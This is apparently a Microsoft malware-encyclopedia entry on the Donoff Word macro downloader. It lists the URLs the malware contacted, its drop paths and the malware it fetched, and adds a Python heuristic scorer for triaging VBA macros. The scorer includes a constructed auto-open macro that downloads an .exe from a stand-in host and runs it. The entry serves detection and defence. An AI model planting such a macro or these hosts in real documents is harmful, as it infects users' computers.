TrojanDownloader:O97M/Donoff
First posted on 15 February 2019.
Source: Microsoft
Aliases:
There are no other names known for TrojanDownloader:O97M/Donoff.
Explanation:
Installation
This threat is a malicious macro script for Microsoft Office files. The macro can download and run other malware on your PC.
It is installed when you open a malicious attachment to a spam email. For example, we have seen this threat attached as a Word document (.doc file) to the following spam emails:
Payload
Downloads other malware
The .doc files contain a malicious macro script that, once the document is opened and macros are allowed to run, downloads and runs other malware on your PC.
The malware uses social engineering tactics to try to get you to enable macro scripting when you view the document, as macro scripts are usually disabled by default in Microsoft Office.
We have seen the malware use the following fake warnings in an attempt to get you to enable macros:
Once macros are enabled, we have seen this threat contact the following URLs to download files, including malware:
adobe-support.us/.exe
bringbackourgals.biz/php/ /ken.exe
bustedrubberbabies.com/js/ .exe
chinamanwoody.com/ .php
chopsecurity.ru/microsoft/word/ .com
climate54.ru/modules/mod_araticlhess/ .php
colfdoc.it/cart/ .exe
dhanophan.co.th/js/ .exe
getimgdcenter.ru/ .png
goldriverlinedancers.nl/components/dancers/ .exe
goo.gl/
iloveberniemovie.ru/ .png
internetincomeengine.net/ .exe
joeniclesd.hostingsiteforfree.com/ .exe
legendarydownloads.com/ .exe
managercomponent.usa.cc/errors/ .0.exe
offshorebags.asia/ .exe
omc.hostingsiteforfree.com/ .exe
papeleriaelcid.com/aurora/ajax/ .exe
rghost.net/download/57465888/967d4c206f2a944160ffcc0f2b889f90a506653d/ .exe
s1.directxex.net/uploads/
socialnetchat.tk/uch/ .exe
u.to/
The downloaded malware is saved to the following locations:
%APPDATA%\fdataupdate.com
%APPDATA%\VTAYOVKKIET.exe
%TEMP%\1101.exe
%TEMP%\8fvk.exe
%TEMP%\enu.exe
%TEMP%\HZLAFFLTDDO.exe
%TEMP%\msml.exe
%TEMP%\NYHEFLJDPZR.exe
%TEMP%\sentinel.exe
%TEMP%\xml.exe
%USERPROFILE%\EPGRE.exe
%USERPROFILE%\fkjhlkj23.com
%USERPROFILE%\SHIPA.exe
C:\JGSNUWKJRFC.exe
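The behaviour described above (an auto-executing macro that fetches a URL, writes the file under a user-writable profile directory such as %TEMP% or %APPDATA%, and runs it) is what an analyst looks for when triaging a suspicious .doc. The following is an added example, not Microsoft's analysis tooling and not code from the Donoff samples: a small heuristic scorer that runs over VBA source already extracted from the document (for instance with oletools' olevba). The indicator regexes and weights are the example's own choices, and both macros embedded at the bottom are constructed for the demo; the example.invalid URL and the msml.exe file name in the sample are made up to resemble the entry's indicators.

```python
"""Heuristic triage of VBA macro source for the Office-downloader pattern:
an auto-executing macro that fetches a URL and runs the file it drops under
%TEMP%, %APPDATA% or %USERPROFILE%.

Added example, not Microsoft's analysis tooling. It expects macro source
already pulled out of the .doc (e.g. with oletools' olevba); the indicator
regexes and weights are this example's own heuristics, and the two macros
at the bottom are constructed for the demo.
"""
import re
from dataclasses import dataclass, field

# Indicator families, matched case-insensitively after cheap string
# de-obfuscation so split keywords such as "Sh" & "ell" are still seen.
INDICATORS = {
    "auto_exec": [r"\bAutoOpen\b", r"\bAuto_Open\b", r"\bAutoExec\b",
                  r"\bDocument_Open\b", r"\bWorkbook_Open\b"],
    "download": [r"\bURLDownloadToFile", r"MSXML2\.(?:Server)?XMLHTTP",
                 r"Microsoft\.XMLHTTP", r"WinHttp\.WinHttpRequest"],
    "write_file": [r"ADODB\.Stream", r"\bSaveToFile\b",
                   r"\bOpen\b[^\n]*\bFor\s+Binary\b"],
    "execute": [r"\bShell\b", r"WScript\.Shell", r"Shell\.Application",
                r"\bShellExecute\b", r"\bCreateProcess"],
    "drop_path": [r'Environ\$?\s*\(\s*"(?:TEMP|APPDATA|USERPROFILE)"\s*\)',
                  r"%(?:TEMP|APPDATA|USERPROFILE)%"],
    "obfuscation": [r"\bChr[W$]?\s*\(", r"\bStrReverse\s*\(", r"\bXor\b"],
}
# A downloader needs to fetch AND run; everything else is supporting evidence.
WEIGHTS = {"auto_exec": 2, "download": 3, "write_file": 1,
           "execute": 3, "drop_path": 1, "obfuscation": 1}
URL_RE = re.compile(r"""https?://[^\s"'<>]+""", re.IGNORECASE)
CHR_RE = re.compile(r"\bChr[W$]?\s*\(\s*(\d{1,3})\s*\)", re.IGNORECASE)
CONCAT_RE = re.compile(r'"([^"]*)"\s*[&+]\s*_?\s*"([^"]*)"')


@dataclass
class TriageResult:
    hits: dict = field(default_factory=dict)  # family -> matched snippets
    urls: list = field(default_factory=list)
    score: int = 0
    verdict: str = "clean"


def deobfuscate_strings(vba: str) -> str:
    """Undo two common VBA tricks: Chr(110) -> "n" for printable ASCII
    (34, the quote character, is left alone) and "ab" & "cd" -> "abcd"."""
    def chr_to_literal(m):
        n = int(m.group(1))
        return '"%s"' % chr(n) if 32 <= n < 127 and n != 34 else m.group(0)
    vba = CHR_RE.sub(chr_to_literal, vba)
    prev = None
    while prev != vba:  # merge adjacent literals until nothing changes
        prev, vba = vba, CONCAT_RE.sub(r'"\1\2"', vba)
    return vba


def triage_macro(vba: str) -> TriageResult:
    """Score one macro module and extract the URLs it would contact."""
    result = TriageResult()
    plain = deobfuscate_strings(vba)
    for family, patterns in INDICATORS.items():
        # Obfuscation is scored on the raw source, before we undo it.
        haystack = vba if family == "obfuscation" else plain
        found = set()
        for pat in patterns:
            found.update(m.group(0) for m in re.finditer(pat, haystack, re.IGNORECASE))
        if found:
            result.hits[family] = sorted(found)
            result.score += WEIGHTS[family]
    result.urls = sorted(set(URL_RE.findall(plain)))
    if "download" in result.hits and "execute" in result.hits:
        result.verdict = "downloader"
    elif result.score >= 4:
        result.verdict = "suspicious"
    return result


# Constructed sample in the style of this entry (not a real Donoff macro):
# the URL and the dropped name are split with & and Chr() to dodge naive greps.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String, p As String
    u = "http://" & "example" & "." & "invalid/js/" & "upd.exe"
    p = Environ("TEMP") & "\" & Chr(109) & Chr(115) & "ml.exe"
    Set h = CreateObject("MSXML2." & "XMLHTTP")
    h.Open "GET", u, False
    h.send
    Set s = CreateObject("ADODB.Stream")
    s.Type = 1: s.Open: s.Write h.responseBody
    s.SaveToFile p, 2
    Shell p, vbHide
End Sub
'''
# Constructed benign macro for contrast.
BENIGN_MACRO = r'''
Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        r = triage_macro(src)
        print(f"{name}: {r.verdict} (score {r.score}) urls={r.urls}")
        for fam, snippets in r.hits.items():
            print(f"  {fam}: {snippets}")
```

The scorer only sees what olevba (or whatever extractor you use) hands it, so macros that rebuild their strings at runtime with more than Chr() and concatenation, or that stage the real payload through a second document, still need manual review; the point of the fetch-plus-run rule is that a benign document almost never needs both. Note also that every drop location listed in this entry is inside the user's own profile, so no elevation is needed for the macro to write and run the file.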
We have seen the following threats being downloaded:
Backdoor:Win32/Fynloski.A
Ransom:MSIL/Swappa.A
Ransom:Win32/Teerac.A
TrojanDownloader:Win32/Drixed.A
Worm:Win32/Gamarue
Analysis by Ric Robielos
Last update: 15 February 2019